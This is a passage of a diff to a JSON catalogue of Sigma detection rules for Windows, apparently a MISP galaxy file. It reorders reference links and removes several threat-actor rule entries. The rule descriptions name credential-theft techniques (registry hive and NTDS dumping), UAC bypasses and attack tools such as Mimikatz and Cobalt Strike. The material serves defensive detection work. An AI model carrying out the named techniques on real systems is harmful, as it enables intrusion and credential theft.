- "related": [
- {
- "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "03e2746e-2b31-42f1-ab7a-eb39365b2422",
- "value": "APT31 Judgement Panda Activity"
- },
{
"description": "Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key",
"meta": {
@@ -52605,9 +51251,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/mattifestation/status/1196390321783025666",
"https://twitter.com/oulusoyum/status/1191329746069655553",
"https://lolbas-project.github.io/lolbas/Binaries/Tttracer/",
+ "https://twitter.com/mattifestation/status/1196390321783025666",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml"
],
"tags": [
@@ -52684,9 +51330,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/",
"https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
"https://lolbas-project.github.io/lolbas/Binaries/Findstr/",
- "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml"
],
"tags": [
@@ -52744,9 +51390,9 @@
"logsource.product": "windows",
"refs": [
"https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject",
- "https://www.mandiant.com/resources/telegram-malware-iranian-espionage",
"https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local",
"https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz",
+ "https://www.mandiant.com/resources/telegram-malware-iranian-espionage",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_execution.yml"
],
"tags": "No established tags"
@@ -52767,9 +51413,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/",
- "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1",
"https://adsecurity.org/?p=2604",
+ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1",
+ "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/",
"https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml"
],
@@ -52826,8 +51472,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md",
+ "https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rar_compress_data.yml"
],
"tags": [
@@ -52910,8 +51556,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100",
"https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100",
+ "https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_http_appdata.yml"
],
"tags": [
@@ -52961,8 +51607,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://thedfirreport.com/2020/06/21/snatch-ransomware/",
"https://web.archive.org/web/20201124182207/https://github.com/yosqueoy/ditsnap",
+ "https://thedfirreport.com/2020/06/21/snatch-ransomware/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_ditsnap.yml"
],
"tags": [
@@ -53029,8 +51675,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec",
"https://www.youtube.com/watch?v=ro2QuZTIMBM",
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_sysinternals_psexec_service.yml"
],
"tags": [
@@ -53053,9 +51699,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/",
"https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/",
"https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf",
+ "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml"
],
"tags": [
@@ -53188,8 +51834,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.radmin.fr/",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1072/T1072.md",
+ "https://www.radmin.fr/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_radmin.yml"
],
"tags": [
@@ -53279,47 +51925,6 @@
"uuid": "b3d34dc5-2efd-4ae3-845f-8ec14921f449",
"value": "Browser Started with Remote Debugging"
},
- {
- "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2019/02/21",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_bear_activity_gtr19.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_bear_activity_gtr19.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1552.001",
- "attack.t1003.003"
- ]
- },
- "related": [
- {
- "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee",
- "value": "Potential Russian APT Credential Theft Activity"
- },
{
"description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1",
"meta": {
@@ -53333,8 +51938,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/0gtweet/status/1474899714290208777?s=12",
"https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace",
+ "https://twitter.com/0gtweet/status/1474899714290208777?s=12",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump.yml"
],
"tags": "No established tags"
@@ -53388,8 +51993,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/blackorbird/status/1140519090961825792",
"https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html",
+ "https://twitter.com/blackorbird/status/1140519090961825792",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_double_extension.yml"
],
"tags": [
@@ -53409,59 +52014,6 @@
"uuid": "1cdd9a09-06c9-4769-99ff-626e2b3991b8",
"value": "Suspicious Double Extension File Execution"
},
- {
- "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2020/03/25",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_cve_2020_10189.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
- "https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_10189.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "attack.execution",
- "attack.t1059.001",
- "attack.t1059.003",
- "attack.s0190",
- "cve.2020.10189"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "846b866e-2a57-46ee-8e16-85fa92759be7",
- "value": "Exploited CVE-2020-10189 Zoho ManageEngine"
- },
{
"description": "setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.",
"meta": {
@@ -53475,10 +52027,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf",
"https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20",
- "https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf",
"https://lolbas-project.github.io/lolbas/Libraries/Setupapi/",
+ "https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf",
+ "https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml"
],
"tags": [
@@ -53498,47 +52050,6 @@
"uuid": "285b85b1-a555-4095-8652-a8a4106af63f",
"value": "Suspicious Rundll32 Setupapi.dll Activity"
},
- {
- "description": "Attempts to detect system changes made by Blue Mockingbird",
- "meta": {
- "author": "Trent Liffick (@tliffick)",
- "creation_date": "2020/05/14",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_blue_mockingbird.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_blue_mockingbird.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1112",
- "attack.t1047"
- ]
- },
- "related": [
- {
- "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "c3198a27-23a0-4c2c-af19-e5328d49680e",
- "value": "Blue Mockingbird"
- },
{
"description": "Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks",
"meta": {
@@ -53983,57 +52494,6 @@
"uuid": "e9f55347-2928-4c06-88e5-1a7f8169942e",
"value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION"
},
- {
- "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2017/09/15",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_cve_2017_8759.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100",
- "https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_8759.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1203",
- "attack.t1204.002",
- "attack.initial_access",
- "attack.t1566.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "fdd84c68-a1f6-47c9-9477-920584f94905",
- "value": "Exploit for CVE-2017-8759"
- },
{
"description": "Detects the execution of CustomShellHost binary where the child isn't located in 'C:\\Windows\\explorer.exe'",
"meta": {
@@ -54114,8 +52574,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/",
"https://twitter.com/bopin2020/status/1366400799199272960",
+ "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_createdump.yml"
],
"tags": [
@@ -54256,8 +52716,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/",
"https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100",
+ "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml"
],
"tags": [
@@ -54313,41 +52773,6 @@
"uuid": "643bdcac-8b82-49f4-9fd9-25a90b929f3b",
"value": "Renamed MegaSync Execution"
},
- {
- "description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant",
- "meta": {
- "author": "Florian Roth (Nextron Systems), @41thexplorer",
- "creation_date": "2018/11/20",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_apt29_phishing_campaign_indicators.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/",
- "https://twitter.com/DrunkBinary/status/1063075530180886529",
- "https://www.mandiant.com/resources/blog/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_apt29_phishing_campaign_indicators.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1218.011"
- ]
- },
- "related": [
- {
- "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "7453575c-a747-40b9-839b-125a0aae324b",
- "value": "APT29 2018 Phishing Campaign CommandLine Indicators"
- },
{
"description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry",
"meta": {
@@ -54363,8 +52788,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/",
"https://docs.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys",
+ "https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml"
],
"tags": [
@@ -54397,8 +52822,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64",
"https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64",
+ "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_empire_powershell_uac_bypass.yml"
],
"tags": [
@@ -54501,9 +52926,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.php.net/manual/en/features.commandline.php",
"https://www.revshells.com/",
"https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet",
+ "https://www.php.net/manual/en/features.commandline.php",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_php_inline_command_execution.yml"
],
"tags": [
@@ -54594,10 +53019,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://gist.github.com/nasbench/6d58c3c125e2fa1b8f7a09754c1b087f",
- "https://twitter.com/mrd0x/status/1511415432888131586",
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/",
"https://twitter.com/mrd0x/status/1511489821247684615",
+ "https://twitter.com/mrd0x/status/1511415432888131586",
+ "https://gist.github.com/nasbench/6d58c3c125e2fa1b8f7a09754c1b087f",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dumpminitool_execution.yml"
],
"tags": [
@@ -54705,11 +53130,11 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html",
"https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a",
"https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone",
- "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware",
+ "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html",
"https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/",
+ "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_rclone_execution.yml"
],
"tags": [
@@ -54775,8 +53200,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://nmap.org/",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-3---port-scan-nmap-for-windows",
+ "https://nmap.org/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nmap_zenmap.yml"
],
"tags": [
@@ -54809,8 +53234,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package",
"https://twitter.com/WindowsDocs/status/1620078135080325122",
+ "https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_install_unsigned_appx_packages.yml"
],
"tags": [
@@ -54821,41 +53246,6 @@
"uuid": "37651c2a-42cd-4a69-ae0d-22a4349aa04a",
"value": "Unsigned AppX Installation Attempt Using Add-AppxPackage"
},
- {
- "description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity",
- "meta": {
- "author": "Florian Roth (Nextron Systems), wagga",
- "creation_date": "2020/12/23",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_lazarus_group_activity.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.hvs-consulting.de/lazarus-report/",
- "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_group_activity.yml"
- ],
- "tags": [
- "attack.g0032",
- "attack.execution",
- "attack.t1059"
- ]
- },
- "related": [
- {
- "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "24c4d154-05a4-4b99-b57d-9b977472443a",
- "value": "Lazarus Group Activity"
- },
{
"description": "Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.",
"meta": {
@@ -54869,9 +53259,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/",
"https://twitter.com/vxunderground/status/1423336151860002816",
"https://attack.mitre.org/software/S0404/",
- "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_params.yml"
],
"tags": [
@@ -55011,39 +53401,6 @@
"uuid": "771d1eb5-9587-4568-95fb-9ec44153a012",
"value": "PUA - NSudo Execution"
},
- {
- "description": "Detects specific process characteristics of Snatch ransomware word document droppers",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2020/08/26",
- "falsepositive": [
- "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely"
- ],
- "filename": "proc_creation_win_malware_snatch_ransomware.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_snatch_ransomware.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1204"
- ]
- },
- "related": [
- {
- "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "5325945e-f1f0-406e-97b8-65104d393fff",
- "value": "Potential Snatch Ransomware Activity"
- },
{
"description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors",
"meta": {
@@ -55090,8 +53447,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/cglyer/status/1182391019633029120",
"https://twitter.com/cglyer/status/1182389676876980224",
+ "https://twitter.com/cglyer/status/1182391019633029120",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml"
],
"tags": [
@@ -55235,14 +53592,14 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection",
+ "https://twitter.com/gN3mes1s/status/941315826107510784",
+ "https://github.com/SigmaHQ/sigma/issues/3742",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md",
"https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e",
- "https://reaqta.com/2017/12/mavinject-microsoft-injector/",
- "https://twitter.com/Hexacorn/status/776122138063409152",
- "https://github.com/SigmaHQ/sigma/issues/3742",
- "https://twitter.com/gN3mes1s/status/941315826107510784",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md",
- "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection",
+ "https://twitter.com/Hexacorn/status/776122138063409152",
+ "https://reaqta.com/2017/12/mavinject-microsoft-injector/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml"
],
"tags": [
@@ -55317,8 +53674,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz",
"https://github.com/skelsec/pypykatz",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_pypykatz.yml"
],
"tags": [
@@ -55384,9 +53741,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048",
"https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44",
"https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
- "https://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml"
],
"tags": [
@@ -55531,8 +53888,8 @@
"logsource.product": "windows",
"refs": [
"https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/",
- "https://twitter.com/frack113/status/1555830623633375232",
"https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN",
+ "https://twitter.com/frack113/status/1555830623633375232",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml"
],
"tags": [
@@ -55609,37 +53966,6 @@
"uuid": "fa3c117a-bc0d-416e-a31b-0c0e80653efb",
"value": "Chopper Webshell Process Pattern"
},
- {
- "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia",
- "meta": {
- "author": "@41thexplorer, Microsoft Defender ATP",
- "creation_date": "2019/11/12",
- "falsepositive": "No established falsepositives",
- "filename": "proc_creation_win_apt_tropictrooper.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://cloudblogs.microsoft.com/microsoftsecure/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_tropictrooper.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79",
- "value": "TropicTrooper Campaign November 2018"
- },
{
"description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process",
"meta": {
@@ -55687,40 +54013,6 @@
"uuid": "a383dec4-deec-4e6e-913b-ed9249670848",
"value": "Potential Signing Bypass Via Windows Developer Features"
},
- {
- "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities",
- "meta": {
